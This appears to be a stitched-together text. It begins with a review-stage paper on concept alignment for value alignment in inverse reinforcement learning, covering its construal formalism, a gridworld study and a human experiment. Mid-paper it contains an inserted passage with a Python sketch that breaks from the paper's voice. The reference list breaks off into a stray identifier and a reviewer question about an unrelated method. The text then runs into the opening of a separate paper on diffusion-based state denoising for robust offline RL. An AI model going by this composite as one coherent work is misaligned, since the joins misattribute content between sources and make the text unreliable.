CONCEPT ALIGNMENT AS A PREREQUISITE FOR VALUE ALIGNMENT Anonymous authors Paper under double-blind review ABSTRACT Value alignment is essential for building AI systems that can safely and reliably interact with people. However, what a person values—and is even capable of valuing—depends on the concepts that they are currently using to understand and evaluate what happens in the world. The dependence of values on concepts means that concept alignment is a prerequisite for value alignment—agents need to align their representation of a situation with that of humans in order to successfully align their values. Here, we formally analyze the concept alignment problem in the inverse reinforcement learning setting, show how neglecting concept alignment can lead to systematic value mis-alignment, and describe an approach that helps minimize such failure modes by jointly reasoning about a person’s concepts and values. Additionally, we report experimental results with human participants showing that humans reason about the concepts used by an agent when acting intentionally, in line with our joint reasoning model. 1 INTRODUCTION People’s thoughts and actions are fundamentally shaped by the concepts they use to represent the world and formulate their goals. Imagine watching someone waiting to cross a busy intersection. Making sense of their behavior requires understanding their representation of things like “the crosswalk,” “the road,” “the bike lane,” and “the right of way.” For instance, it is important to take into account whether someone understands or is aware of the part of the street designated the “bike lane” while they wait since otherwise their intentions could be misinterpreted (e.g., a naïve observer might think someone standing in the bike lane is trying to get hit by a bicycle). Yet, current approaches to inferring human goals, rewards, and values (e.g., standard inverse reinforcement learning [Abbeel & Ng, 2004] and value alignment [Hadfield-Menell et al., 2016]) largely neglect the possibility that a machine observer and a human actor can have misaligned concepts. Our goal in this work is to formally state the problem of concept alignment, begin to explore algorithmic solutions, and compare these solutions to human judgments. To formalize concept alignment, we draw on the recently proposed framework of value-guided construal [Ho et al., 2022], which provides a computational account of how humans form simplified representations of problems in order to solve them. A construal is a particular interpretation of a problem in terms of a set of concepts and related causal affordances. Different construals encode different conceptual understandings of the world: for example, if one understands the concept of the bike lane and includes it in their current construal, they are aware that bicycles are often in the bike lane, cars generally avoid the bike lane, you might get hit if you stand in the bike lane, etc. People often prefer simpler construals since they are less cognitively effortful [Ho et al., 2023], but this can affect the quality of one’s actions—e.g., if you fail to distinguish the bike lane from the sidewalk, you might stand in a place where a bicycle will hit you! As we discuss later, our approach is to incorporate construals into a forward model of planning, which allows us to articulate the problem of conceptual misalignment as a form of misspecified inverse planning [Baker et al., 2009]. 
We propose a theoretical framework for formally introducing concepts to inverse reinforcement learning and show that conceptual misalignment (i.e., failing to consider construals) can lead to severe value misalignment (i.e., reward mis-specification; large performance gap). We validate these theoretical results with a case study using a simple gridworld environment where we find that IRL agents that jointly model construals and reward outperform those that only model reward. Finally, we conduct a study with human participants and find that people do model construals, and that their inferences about rewards are a much closer match to the agent that jointly models construals and rewards. Our theoretical and empirical results suggest that the current paradigm of just trying to directly infer human reward functions or preferences from demonstrations is insufficient for value-aligning real AI systems that need to interact with real people; it is crucial to also model and align on the concepts people use to reason about the task in order to understand their true values and intentions. 2 RELATED WORK Work on inferring human preferences and values is often done in the framework of inverse-reinforcement learning (IRL) (Abbeel & Ng [2004], Hadfield-Menell et al. [2016], Ho et al. [2016]) and inverse planning (Baker et al. [2009]). In the standard IRL setting, an agent is tasked with estimating or inferring the reward function that an expert is optimizing. An important benefit of IRL over other methods for learning from expert human behavior, such as behavioral cloning (Munro et al. [2011]), is that it facilitates generalization to new scenarios outside of the data given. For instance, by inferring that a human has a dispreference for eating spinach after observing behavior at home, an agent could anticipate behavior in new scenarios in which spinach appears, such as in a restaurant. Over the past two decades, methods for IRL have been extended in various ways and even used as models for social cognition in cognitive science (Ho & Griffiths [2022]). However, a key property of virtually all existing IRL methods is that they assume behavior emerges from a planning process that produces optimal or noisy-optimal policies (Abbeel & Ng [2004], Loftin et al. [2016], Ziebart et al. [2008]). This assumption is problematic because it is false (Simon [1955], Tversky & Kahneman [1974]). An alternative perspective that has been developed over the past few years is that people are resource-rational—that is, they think and act rationally, but are subject to cognitive limitations on time, memory, or attention (Lieder & Griffiths [2020]). A major research challenge for IRL, value alignment, and cognitive science is incorporating these ideas into estimating human preferences and values (Ho & Griffiths [2022]; Evans et al. [2016]; Zhi-Xuan et al. [2020]; Kwon et al. [2020]; Alanqary et al. [2021]; Chan et al. [2021]; Laidlaw & Dragan [2022]). The work here builds on recent approaches to modeling resource-rational human planning in the value-guided construal framework, which provides an account of how humans rationally simplify problems and apply simplified concepts in order to plan (Ho et al. [2022], [2023]). The key idea of value-guided construals is that people do not necessarily use all concepts available when representing a problem in order to make efficient use of limited attention (e.g., ignoring certain details of obstacles when navigating through a GridWorld). 
Applied to the IRL setting, this involves inverting the value-guided construal model of human decision-making and using it instead of the classical noisy-rational model. Our goal here is to provide an initial demonstration of the utility of incorporating concept simplification strategies into value alignment and IRL.

3 INTRODUCING CONSTRUALS INTO INVERSE REINFORCEMENT LEARNING

We begin by reviewing the basic formalism for sequential decision-making before turning to construals and the inverse planning problem.

3.1 BACKGROUND

We represent sequential decision-making tasks as Markov decision processes (MDPs) \( M = \langle S, A, P_0, T, R, \gamma \rangle \), where \( S \) is a state space; \( A \) is an action space; \( P_0 : S \rightarrow [0, 1] \) is an initial state distribution; \( T : S \times A \times S \rightarrow [0, 1] \) is a transition function; \( R : S \times A \rightarrow \mathbb{R} \) is a real-valued reward function; and \( \gamma \in [0, 1) \) is a discount rate. A (stochastic) policy is a conditional probability distribution that maps states to distributions over actions, \( \pi : S \rightarrow \Delta(A) \). We denote the Markov chain resulting from following policy \( \pi \) on an MDP with dynamics \( T \) as \( T^\pi(s' \mid s) = \sum_a \pi(a \mid s)T(s' \mid s, a) \).

We consider standard (unregularized) and entropy-regularized solutions to MDPs. In the unregularized setting, the value function associated with a policy \( \pi \) on an MDP with dynamics \( T \) and reward function \( R \) maps each state to the expected cumulative, discounted reward that results from following \( \pi \):
\[ V_{(R,T)}^\pi(s) = \sum_a \pi(a \mid s)\big[R(s,a) + \gamma \sum_{s'} T(s' \mid s,a)V_{(R,T)}^\pi(s')\big]. \]
The state occupancy function (also known as the successor representation) associated with a policy \(\pi\) on an MDP with dynamics \(T\) is the expected discounted visitations to a state \(s^+\) starting from a state \(s\), \(\rho_T^\pi(s; s^+) = \mathbb{1}[s^+ = s] + \gamma \sum_{s'} T^\pi(s' \mid s)\rho_T^\pi(s'; s^+)\). The optimal value function for an MDP \(M\) maximizes value at each state, \(V_{(R,T)}^{*}(s) = \max_a \{R(s,a) + \gamma \sum_{s'} T(s' \mid s,a)V_{(R,T)}^{*}(s')\}\).

In the entropy-regularized setting, the value of a policy \(\pi\) on MDP \(M\) is modified to include an entropy term, which penalizes action distributions that are more deterministic: \(H(\pi(\cdot \mid s)) = -\sum_a \pi(a \mid s) \ln \pi(a \mid s)\). When this penalty is parameterized by a weight \(\beta\), we denote the optimal entropy-weighted value function as \(V_{(R,T)}^{*\beta}(s) = \max_\pi \left\{ \sum_a \pi(a \mid s)\big[R(s,a) + \gamma \sum_{s'} T(s' \mid s,a)V_{(R,T)}^{*\beta}(s')\big] + \beta H(\pi(\cdot \mid s)) \right\}\).

### 3.2 Inverse Reinforcement Learning (IRL)

The standard IRL problem formulation involves an observer attempting to estimate the reward function of an expert demonstrator based on observed behavior. This can be formalized as Bayesian inference, where given a trajectory of the expert acting in the task, \(\zeta = \{(s_0,a_0),(s_1,a_1),\ldots,(s_T,a_T)\}\), the observer infers the demonstrator's reward function, \(R\):
\[ P(R \mid \zeta) = \frac{P(\zeta \mid R)P(R)}{P(\zeta)}. \]
To calculate the likelihood of a trajectory \(\zeta\) given a reward function \(R\), it is typically assumed that the observer has knowledge of the dynamics of the demonstrator's task, \(T\).
Then, the likelihood is the probability of the trajectory being generated by the entropy-regularized (noisily-optimal) policy under a candidate \(R\):
\[ P(\zeta \mid R) = \prod_{(s_t,a_t) \in \zeta} \pi_{(R,T)}^\beta(a_t \mid s_t). \]

### 3.3 Inverse Construal

The inverse construal problem considers the possibility that although a resource-limited demonstrator is acting in a task with a particular dynamics \(T\), they may not be planning their actions with respect to the fully-detailed dynamics. Rather, the demonstrator's behavior results from planning with respect to a construed task dynamics, \(\tilde{T}\), which reflects their possibly incomplete understanding of the environment (e.g., whether notches are traversable). Thus, an observer that takes into account the resource limitations faced by human planners should instead be aiming to solve an inference problem that incorporates the possibility of alternative task construals. Formally, this is the problem:
\[ P(R,\tilde{T} \mid \zeta) = \frac{P(\zeta \mid R,\tilde{T})P(R,\tilde{T})}{P(\zeta)}, \]
where the prior \(P(R,\tilde{T})\) is uniform and the likelihood is given by
\[ P(\zeta \mid R,\tilde{T}) = \prod_{(s_t,a_t) \in \zeta} \pi_{(R,\tilde{T})}^\beta(a_t \mid s_t). \]

### 3.4 Consequences of Not Considering Construals

How bad can the estimate of \(R\) be when assuming the true dynamics \(T\) versus attempting to estimate the demonstrator's construal \(\tilde{T}\)? If we use a maximum causal entropy formulation of IRL to get an estimated policy \(\hat{\pi}_{\text{InvRL}}\) and compare this to the estimated policy assuming the demonstrator is using a construal, \(\hat{\pi}_{\text{InvCon}}\), then the learner's performance gap on the true task satisfies (Viano et al., 2021):
\[ |V_{(R,T)}^{\hat{\pi}_{\text{InvCon}}} - V_{(R,T)}^{\hat{\pi}_{\text{InvRL}}}| \leq \frac{\gamma \cdot |R|^{\text{max}}}{(1-\gamma)^2} \cdot \max_{s,a} \|T(\cdot \mid s,a) - \tilde{T}(\cdot \mid s,a)\|_1, \]
where \(|R|^{\text{max}} = \max_{s,a} |R(s,a)|\). This is a tight bound, and thus the risk associated with not modeling construals (i.e., the potential size of the gap) grows rapidly when the discount factor, the maximum reward, or the dynamics mismatch increases. In other words, if the observer has an inaccurate estimate of the transition function the actor uses to plan, they may drastically mis-estimate the reward function that motivated behavior. This provides a formal expression of our introductory example, in which failing to consider that a person does not know about or is unaware of a bike lane might lead one to interpret standing in the bike lane as indicating a desire to be hit by a bicycle.

4 A Simple Example of Concept Misalignment

Our theoretical results show that concept misalignment creates risk of value misalignment (i.e., a large performance gap can exist). We now aim to show that the performance gap indeed exists in practice. First, we flesh out our bike lane example into a city navigation case study. Suppose Alice is trying to navigate a city to get a cup of coffee. There is a mom-and-pop bakery where she could get her favorite pastry and a delicious coffee, and a fast food franchise where she will have to wait in line and overpay but will still get a decent coffee. Given the choice, she would strongly prefer to go to the bakery. There are areas she can walk through (i.e., streets) and areas she cannot go through (i.e., locked buildings). However, there are also some unlocked buildings that she could cut through if only she knew that they are unlocked.
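Before continuing with Alice's story, the inference problems in Sections 3.2 and 3.3 can be made concrete with a small tabular sketch. Everything below is an illustrative assumption rather than the paper's implementation: the soft value iteration routine, the enumeration over a finite grid of candidate rewards and construals, and all function names.

```python
import numpy as np

def soft_policy(R, T, gamma=0.95, beta=1.0, iters=200):
    """Entropy-regularized (Boltzmann-rational) policy via soft value iteration.

    R: (S, A) rewards; T: (S, A, S) transition probabilities.
    Returns pi: (S, A), the policy pi^beta_{(R, T)}.
    """
    V = np.zeros(R.shape[0])
    for _ in range(iters):
        Q = R + gamma * T @ V                               # soft Bellman backup
        V = beta * np.log(np.exp(Q / beta).sum(axis=1))     # soft maximum over actions
    Q = R + gamma * T @ V
    return np.exp((Q - V[:, None]) / beta)                  # rows sum to 1

def log_likelihood(traj, R, T):
    """log P(zeta | R, T~): sum of log pi(a_t | s_t) along the trajectory."""
    pi = soft_policy(R, T)
    return sum(np.log(pi[s, a]) for s, a in traj)

def joint_posterior(traj, candidate_Rs, candidate_Ts):
    """Uniform-prior posterior P(R, T~ | zeta) over an enumerated candidate grid."""
    logp = np.array([[log_likelihood(traj, R, T) for T in candidate_Ts]
                     for R in candidate_Rs])
    post = np.exp(logp - logp.max())                        # stabilized normalization
    return post / post.sum()
```

Fixing `candidate_Ts` to the true dynamics recovers the reward-only posterior of Section 3.2, so marginalizing the joint posterior over construals and comparing the two estimates of \(R\) exposes exactly the kind of gap bounded in Section 3.4.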
If she perceives both the bakery and the fast food place as being accessible, she will always choose to go to the bakery (regardless of distance). However, if only the latter seems accessible, she will go get her coffee there. We visualize this setup in Figure 1. The left column corresponds to this hypothetical case where Alice prefers the bakery, and the right column corresponds to an alternate hypothetical case where Alice instead prefers the fast food place. Now consider the case where the bakery is inside a closed courtyard and the only way to reach it is to go through an unlocked building, but the fast food place is outside of the courtyard. If Alice is unaware that there are unlocked buildings that give access to the courtyard, she may end up going to the fast food place. An observer who does not take into account that Alice does not realize there are unlocked buildings to cut through would incorrectly infer that she prefers the fast food place (see Figure 1, bottom-left).

To investigate the impact of modeling (or not modeling) a construal on value alignment between a human demonstrator and a machine IRL agent in scenarios such as this city navigation example, we use blocks-and-notches maze tasks similar to those developed by Ho et al. (2023) to study rigidity in people's construals (Figure 1). Each blocks-and-notches maze consists of a start state depicted as a blue circle (e.g., where Alice starts off), a high-value goal (e.g., the bakery) depicted as a pink or yellow square, a low-value goal (e.g., the fast food place) depicted as a yellow or pink square, and blue $3 \times 3$ blocks (e.g., buildings). The dark blue squares prevent movement (e.g., locked buildings), but the light blue notches (e.g., unlocked buildings) permit movement through the blocks. This environment allows us to simulate scenarios analogous to the city navigation ones described above.

4.1 Notches

In our simulations, notches (represented by light blue squares within the $3 \times 3$ blue blocks) are shortcuts through the grid. The idea is that while everyone is shown the same view when tasked with navigating the grid, only some demonstrators notice and learn how to use the notches; others ignore the light blue vs. dark blue distinction and treat the entire $3 \times 3$ blue block as an obstacle, which they navigate around. In other words, people with different construals of the same ground truth grid learn different paths (Ho et al., 2023). A standard IRL agent trying to infer a demonstrator's rewards in this task is misaligned at the concept level because it assumes an optimal policy (and therefore has no notion that a human might not understand notches or how to use them). Humans, as we have discussed before, often act in ways that are not conventionally considered optimal or even rational. The IRL agent, without an understanding of the different construals people are using to understand the grid, draws incorrect conclusions about people's values (rewards). Of the four scenarios (Figure 1) used in our experiments, the two on the bottom depict routes taken by simulated demonstrators who did not realize they could walk through notches. The near (pink) goal is unreachable without using notches; think of it as the bakery enclosed on all sides by buildings ($3 \times 3$ dark blue blocks), some of which are unlocked (light blue notches).
The grids on the top show the trajectory of a simulated demonstrator who has learned that a notch is a shortcut, and has used the notch to form a more efficient path to their preferred goal. On the bottom are the trajectories of a simulated demonstrator who only knows that the blue 3 × 3 blocks are obstacles, without paying attention to the fact that some sub-blocks (notches) are not obstacles at all. Looking at the trajectories on the lower half, an IRL agent that has no notion of construals and assumes an optimal policy would naturally conclude that the human demonstrator has a value-related reason for avoiding the pink goal, and would thus assume that the yellow goal has a higher reward. Thus we see value misalignment emerge as a consequence of concept misalignment between the human demonstrator and the IRL agent.

Figure 1: Four trajectories produced by different combinations of rewards and construals. The two trajectories on the lower half with the construal "Does not understand notches" look similar, because the preferred (pink) goal is impossible to reach when not construing notches.

4.2 VALUE MISALIGNMENT

In our reinforcement learning framework, we use rewards as a proxy for values. To demonstrate how concept misalignment can lead to value misalignment between humans and machines, we employ an inverse reinforcement learning agent to infer the human's values (reward function). Without knowledge of the construals (different understandings of notches), the agent might misattribute the path to a higher reward value for the chosen goal, not realizing that the other goal may in fact have a higher reward but be impossible to reach without using (or paying attention to) notches. As a measure of how alignment at the construal level can improve value alignment, we compare the posterior probability $P(R, \tilde{T} | \zeta)$ when jointly modeling the reward and the construal, to $P(R | \zeta)$, the standard IRL posterior, which assumes that the trajectory comes from a policy optimal with respect to the true transition function. We run inference to calculate these probabilities for the three GridWorlds shown in Figure 2, using both the reward-only model and the joint reward and construal model. The full twelve trajectories used for inference (four scenarios over each of the three GridWorlds) are shown in Figure 4.

4.3 Model results

We find that the joint reward and construal model performs on par with the reward-only model in the settings where the demonstrator "understands notches", but significantly outperforms the reward-only model in inferring values in the difficult "Does not understand notches" scenario, where the preferred (pink) goal is inaccessible without using notches. In this scenario, the joint model correctly infers that the pink goal has a higher reward even though the demonstrator visits it in only one out of the three demonstrations for that scenario. The reward-only model fails completely, inferring confidently and incorrectly that the yellow goal has a higher reward due to the higher number of visits. See Figure 4 for a full comparison.

5 Human Experiments

We have now shown both theoretically and in simulation that a performance gap due to concept misalignment is not only possible but also plausible. But if vanilla inverse reinforcement learning is insufficient for inferring people's intent and preferences in the real world, then how do people manage to do these things in practice?
We now show that humans a) are highly adept at reasoning about construals, and b) use their knowledge of construals when making inferences about others' paths. In this behavioral experiment, we gave 100 human participants the same four trajectories given to the two IRL agents (Figure 1) and asked them to make the same inferences. Each participant was shown a live replay of each trajectory, and then asked to infer (Figure 5) whether the person who took this route realized they could walk through notches, and whether they preferred the pink goal to the yellow goal. Participants were asked to respond true or false to each question, and these responses were then mapped to scores of 1 or -1 when computing the results. These two questions map naturally to the posteriors of the IRL algorithm's construal and reward inferences about each goal. A full walkthrough of the instructions, visuals, and questions shown to the human participants is included in the supplementary materials[1]. We also scale the IRL posterior inferences to this -1 to 1 scale for direct comparison with the human judgments.

---

1 Code and data: https://osf.io/hd9vc/?view_only=967b0c2f981d4a87bf4d21ff818f1322

Figure 3: One frame of the data collection process where we collected human judgments on the IRL task given the trajectories in Figure 1. In this example, the person prefers the pink goal but does not realize they can walk through notches. In the leftmost grid, they can access their preferred pink goal without using notches. But in the other two grids, they cannot access their preferred pink goal and opt for the yellow goal instead. An IRL algorithm that does not consider construals would assume that the person is intentionally choosing the yellow goal over the pink one most of the time, and would incorrectly conclude that the yellow goal has a higher reward, when in fact it is the other way around.

Table 1: Proportion of human participants who correctly inferred rewards for each scenario. p-values are from a one-sided binomial test corresponding to the null hypothesis that the human reward inferences are explained by random chance.

| Scenario | Proportion correct | p-value |
|----------------------------------------------|--------------------|-----------|
| Understands notches + pink goal higher reward | 0.99 | 7.967e-29 |
| Doesn't understand notches + pink goal higher reward | 0.70 | 3.925e-05 |
| Understands notches + yellow goal higher reward | 0.98 | 3.984e-27 |
| Doesn't understand notches + yellow goal higher reward | 0.98 | 3.984e-27 |

5.1 Results

There are three components to our results: human data, IRL inference when jointly modeling rewards and construals, and IRL inference when modeling only reward. These results are shown side-by-side in Figure 4. The posteriors of the IRL inference are scaled to match the -1 to 1 scale of the human data. Error bars for the human data are one standard error from the mean over all 100 participants, for each question of each trajectory. We show that humans completing the same inference task as the IRL agents successfully use construals to make more accurate reward inferences (see Table 1), matching the behavior of the joint reward and construal model (see Figure 4). We also calculate correlations between human reward inferences and model reward inferences, which demonstrate that the joint reward and construal model is highly correlated with human reward inferences in the same scenarios (see Table 2).
Table 2: Correlations between model and human inferences of reward | | Pearson correlation coefficient | p-value | |----------------------|---------------------------------|---------| | Reward-only IRL | 0.757 | 0.242 | | Jointly-modeled IRL | **0.970** | **0.029**| Figure 4: Inferences produced by humans and the two models. In the most difficult "Does not understand notches" scenario in the lower left corner, jointly modeling construals and rewards allows the IRL algorithm to successfully infer that the pink goal has higher reward, despite not being the most frequently accessed goal. Human subjects also make this inference. The reward-only IRL agent answers incorrectly and confidently that the yellow goal has higher reward. 6 DISCUSSION In this work, we formulate the problem of concept alignment within the framework of value-guided construals. When people are faced with a task, they often do not represent it in full detail and instead engage in simplification strategies to make more efficient use of limited cognitive resources (Ho et al., 2022). As a result, people may use simplified concepts that lead to different behaviors than if they had represented the task in complete detail. Our main goal here has been to formalize the inverse problem of estimating what simplified concepts people are using and show how such an approach is needed for successful value alignment in a simple setting. In the most difficult scenario of the “Does not understand notches” construal, the reward-only IRL agent confidently makes a very incorrect inference (see Figure 4) because it does not model the construal. Modeling construals and allowing for alignment at a conceptual level enables the IRL algorithm to correctly infer human rewards and values instead of confidently making an incorrect inference. Modeling construals also brings the IRL behavior closer to the human participants’ behavior, because it creates a shared conceptual framework which enables more accurate reasoning about another person’s rewards and values. 6.1 SOCIETAL IMPLICATIONS OF CONCEPT MISALIGNMENT Our results carry important implications for almost all settings where AI systems are expected to interact with people and align with their values or preferences, often in high-stakes, complex scenarios. For example, scaling up concept alignment to a healthcare diagnostic algorithm would not require agent-based IRL at all. Rather the concepts would be the medical imaging artifacts supporting diagnostic decisions, labelled by the words human physicians use to describe those artifacts. The goal would be to align those concepts to a diagnostic algorithm which analyzes the medical image and suggests a course of action, like surgery. This type of concept alignment would be a necessary prerequisite to meaningfully discuss surgery based on what the patient values most (mobility, lack of pain, effect on other organs, long-term psychological impact of the procedure). In many such contexts of AI-human interaction, concept-level alignment lays the groundwork for value alignment. 6.2 LIMITATIONS AND FUTURE WORK While our theoretical results apply to many different settings with different types of construals, our experiments focused on a case study where we could control the features that form the basis for construals. In real-world settings, there are countless more features and a simple construal model would clearly be insufficient. 
However, our goal was not to suggest that this specific simplified construal model is the solution to value alignment, but rather to demonstrate that concept misalignment is, in fact, a problem that AI researchers need to focus on to make progress on value alignment. In future work, we intend to scale this approach in a wider variety of settings with human experts, and involving a wider variety of inference algorithms that can scale to larger reward and construal spaces (Ho & Ermon, 2016; Herman et al., 2016; Chakraborti et al., 2019; Gopalakrishnan et al., 2021; McCallum, 1996; Cao et al., 2021). As the algorithms scale, so too should the empirical studies of human behavior to measure their alignment at the concept- and value-levels. More broadly, we hope that demonstrating the critical importance of concept alignment to the larger goal of value alignment will open the door to future work characterizing concept and value alignment in real-world settings. 6.3 CONCLUSION Human decision-making is complex, context-driven, and resource-dependent and we have to keep that in mind when we try to teach AI systems to infer human values. We have laid out a framework introducing the notion of concepts into inverse reinforcement learning and showed both theoretically and empirically that without concept alignment it may often be impossible to achieve value alignment. We also showed in a behavioral study that people reason about each other’s concepts when making inferences about each other’s goals and values. We hope that these results encourage other researchers to work on concept alignment as a crucial component in value alignment, effective human-AI interaction, and the development of safe autonomous agents. REFERENCES Pieter Abbeel and Andrew Y Ng. Apprenticeship learning via inverse reinforcement learning. In Proceedings of the twenty-first international conference on Machine learning, pp. 1, 2004. Arwa Alanqary, Gloria Z Lin, Joie Le, Tan Zhi-Xuan, Vikash K Mansinghka, and Joshua B Tenenbaum. Modeling the mistakes of boundedly rational agents within a bayesian theory of mind. arXiv preprint arXiv:2106.13249, 2021. Chris L Baker, Rebecca Saxe, and Joshua B Tenenbaum. Action understanding as inverse planning. Cognition, 113(3):329–349, 2009. Zhangjie Cao, Yilun Hao, Mengxi Li, and Dorsa Sadigh. Learning feasibility to imitate demonstrators with different dynamics. arXiv preprint arXiv:2110.15142, 2021. Tathagata Chakraborti, Anagha Kulkarni, Sarath Sreedharan, David E Smith, and Subbarao Kambhampati. Explicability? legibility? predictability? transparency? privacy? security? the emerging landscape of interpretable agent behavior. In Proceedings of the international conference on automated planning and scheduling, volume 29, pp. 86–96, 2019. Lawrence Chan, Andrew Critch, and Anca Dragan. Human irrationality: both bad and good for reward inference. arXiv preprint arXiv:2111.06956, 2021. Owain Evans, Andreas Stuhlmüller, and Noah Goodman. Learning the preferences of ignorant, inconsistent agents. In Proceedings of the AAAI Conference on Artificial Intelligence, volume 30, 2016. Sriram Gopalakrishnan, Mudit Verma, and Subbarao Kambhampati. Synthesizing policies that account for human execution errors caused by state aliasing in markov decision processes. In ICAPS 2021 Workshop on Explainable AI Planning, 2021. Dylan Hadfield-Menell, Stuart J Russell, Pieter Abbeel, and Anca Dragan. Cooperative inverse reinforcement learning. Advances in neural information processing systems, 29, 2016. 
Michael Herman, Tobias Gindele, Jörg Wagner, Felix Schmitt, and Wolfram Burgard. Inverse reinforcement learning with simultaneous estimation of rewards and dynamics. In Artificial intelligence and statistics, pp. 102–110. PMLR, 2016.

Jonathan Ho and Stefano Ermon. Generative adversarial imitation learning. Advances in neural information processing systems, 29, 2016.

Mark K. Ho and Thomas L. Griffiths. Cognitive science as a source of forward and inverse models of human decisions for robotics and control. Annual Review of Control, Robotics, and Autonomous Systems, 5(1):33–53, 2022. doi: 10.1146/annurev-control-042920-015547. URL https://doi.org/10.1146/annurev-control-042920-015547.

Mark K Ho, Michael Littman, James MacGlashan, Fiery Cushman, and Joseph L Austerweil. Showing versus doing: Teaching by demonstration. Advances in neural information processing systems, 29, 2016.

Mark K Ho, David Abel, Carlos G Correa, Michael L Littman, Jonathan D Cohen, and Thomas L Griffiths. People construct simplified mental representations to plan. Nature, 606(7912):129–136, 2022.

Mark K Ho, Jonathan D Cohen, and Tom Griffiths. Rational simplification and rigidity in human planning, Mar 2023. URL psyarxiv.com/aqxws.

Minae Kwon, Erdem Biyik, Aditi Talati, Karan Bhasin, Dylan P Losey, and Dorsa Sadigh. When humans aren't optimal: Robots that collaborate with risk-aware humans. In Proceedings of the 2020 ACM/IEEE international conference on human-robot interaction, pp. 43–52, 2020.

Cassidy Laidlaw and Anca Dragan. The Boltzmann policy distribution: Accounting for systematic suboptimality in human models. arXiv preprint arXiv:2204.10759, 2022.
ZULjcYLWKe
In the experiments, the results show that DMBP significantly improves the robustness of existing offline RL methods. The reviewer noticed that most of the offline RL methods used are value-based. How will DMBP perform when used with weighted imitation learning methods, e.g., IQL?
DMBP: Diffusion Model-Based Predictor for Robust Offline Reinforcement Learning Against State Observation Perturbations

Zhihe Yang\textsuperscript{1,2} Yunjian Xu\textsuperscript{1,2} *

\textsuperscript{1}The Chinese University of Hong Kong, Hong Kong SAR, China \textsuperscript{2}The Chinese University of Hong Kong, Shenzhen Research Institute (SZRI), Guangdong, China

[email protected], [email protected]

Abstract

Offline reinforcement learning (RL), which aims to fully explore offline datasets for training without interaction with environments, has attracted growing recent attention. A major challenge for the real-world application of offline RL is robustness against state observation perturbations, e.g., as a result of sensor errors or adversarial attacks. Unlike online robust RL, agents cannot be adversarially trained in the offline setting. In this work, we propose the Diffusion Model-Based Predictor (DMBP), a new framework that recovers the actual states with conditional diffusion models for state-based RL tasks. To mitigate the error accumulation issue in model-based estimation resulting from the classical training of conventional diffusion models, we propose a non-Markovian training objective that minimizes the sum entropy of denoised states over the RL trajectory. Experiments on standard benchmark problems demonstrate that DMBP can significantly enhance the robustness of existing offline RL algorithms against different scales of random noises and adversarial attacks on state observations. Further, the proposed framework can effectively deal with incomplete state observations with random combinations of multiple unobserved dimensions in the test. Our implementation is available at \url{https://github.com/zhiyang2226/DMBP}.

1 Introduction

Reinforcement learning (RL) has been proven to be a powerful tool for high-dimensional decision-making problems under uncertainty (Mnih et al., 2015; Silver et al., 2017; Schrittwieser et al., 2020). However, its trial-and-error learning manner requires frequent interactions with the environment, which can be expensive and/or dangerous in a variety of real-world applications (Levine et al., 2020). A widely adopted solution is to build up a simulator for policy training, which is costly and may fail due to the discrepancy between the simulator and reality. As a promising alternative that has received growing attention, offline RL fully explores offline datasets and requires no interaction with the environments in the training process.

A major challenge of offline training is robustness against perturbations on state observations, which may result from sensor errors, adversarial attacks, and mismatches between static datasets and the real environment. For example, GPS signal errors can lead to inaccurate positioning of autonomous vehicles, and position sensor errors can lead to erroneous estimation of robot arm postures. The robustness of the trained policy against state perturbations is vital for preventing agents from making catastrophic movements. In online settings, various adversarial training methods have been proposed to robustly handle the mismatch between observed and actual states (Zhang et al., 2020, 2021; Sun et al., 2021). These methods are not directly applicable in offline training. A classical approach against perturbed state observations is to train robust policies against worst-case disturbances (see the left subplot in Figure 1), which may lead to over-conservatism (Zhang et al., 2020, 2021).
In a pioneering work (Yang et al., 2022), the authors propose an alternative approach that adopts a conservative smoothing method to smoothen the Q-value and regularize the policy, preventing the agent from taking catastrophic movements under adversarial attacks in the test. The performance of the aforementioned approach may decay quickly with increasing noise scale, especially in complicated environments with high-dimensional action and state spaces.

For online image-based deep RL, Lin et al. (2017) propose a model-based approach to "denoise" the observations by predicting the actual states. They construct a multiple-layer perceptron (MLP) neural network to detect the adversarial attack on image-based observations and predict the original states for decision-making in Atari games. For state-based RL tasks, similar MLP-based prediction methods have been used as data augmentation in online (Janner et al., 2019) and offline (Yu et al., 2020; 2021) settings instead of as denoising tools. In general, MLP-based prediction methods cannot be applied to complicated state-based tasks (like Mujoco) that are sensitive to observation noise and prone to error accumulation.

Recently, diffusion-based generative models (Sohl-Dickstein et al., 2015; Ho et al., 2020; Song et al., 2020b) have been widely used in offline RL/decision-making problems as trajectory generators (Janner et al., 2022; Ajay et al., 2022; Liang et al., 2023) and behavior cloners (Wang et al., 2022). We note that the potential of diffusion models to facilitate decision making via state denoising has not been fully explored. Towards this end, we propose a new framework that predicts the actual states against observation perturbations for state-based offline RL, which is referred to as the Diffusion Model-Based Predictor (DMBP). Different from the aforementioned works, the proposed approach utilizes diffusion models as noise reduction tools rather than generation models, and can therefore enhance the robustness of existing offline RL algorithms against different scales of perturbations on state observations.

A diagram of the proposed approach is shown in the right subplot of Figure 1. Given the past-estimated state trajectory, the last-step agent-generated action, and the noised current state from the environment, DMBP utilizes a conditional diffusion model to estimate the current state via reverse denoising. To mitigate the error accumulation issue in state estimation, we propose a new non-Markovian loss function that minimizes the sum entropy of denoised states over the RL trajectory (cf. Section 4). To better capture the relationship between the noised current state and the denoised state trajectory (especially the last RL timestep denoised state), we propose an Unet-MLP neural network structure to predict noise information (cf. Appendix B.1). The output of DMBP is an estimation of the current state, which is fed into an offline RL algorithm to generate the action. To our knowledge, this is the first state denoising framework for offline RL against observation perturbations in state-based tasks.

The proposed framework has several advantages over existing offline RL methods against noisy observations. First, with the objective of recovering the actual state, DMBP can significantly strengthen the robustness of existing offline RL algorithms against different scales of random noises and adversarial attacks.
The proposed approach does not lead to over-conservative policies, compared with counterparts that train robust policies against worst-case (or adversarial) perturbations. Further, by virtue of the capability of diffusion models to infill missing regions (i.e., image inpainting), DMBP facilitates decision making under incomplete state observations with random combinations of multiple unobserved dimensions in the test. Such a situation is common in reality, for example, when robots continue to work with compromised sensors.

2 RELATED WORKS

Robust RL. Robust RL can be divided into two categories: training-time and testing-time robustness. Training-time robust RL involves perturbations during the training process, while evaluating the agent in a clean environment (Zhang et al., 2022b; Ye et al., 2023). Conversely, testing-time robust RL focuses on training the agent with unperturbed datasets or environments and then testing its performance in the presence of disturbances (Yang et al., 2022; Panaganti et al., 2022). Our work primarily aims at enhancing the testing-time robustness of existing offline RL algorithms.

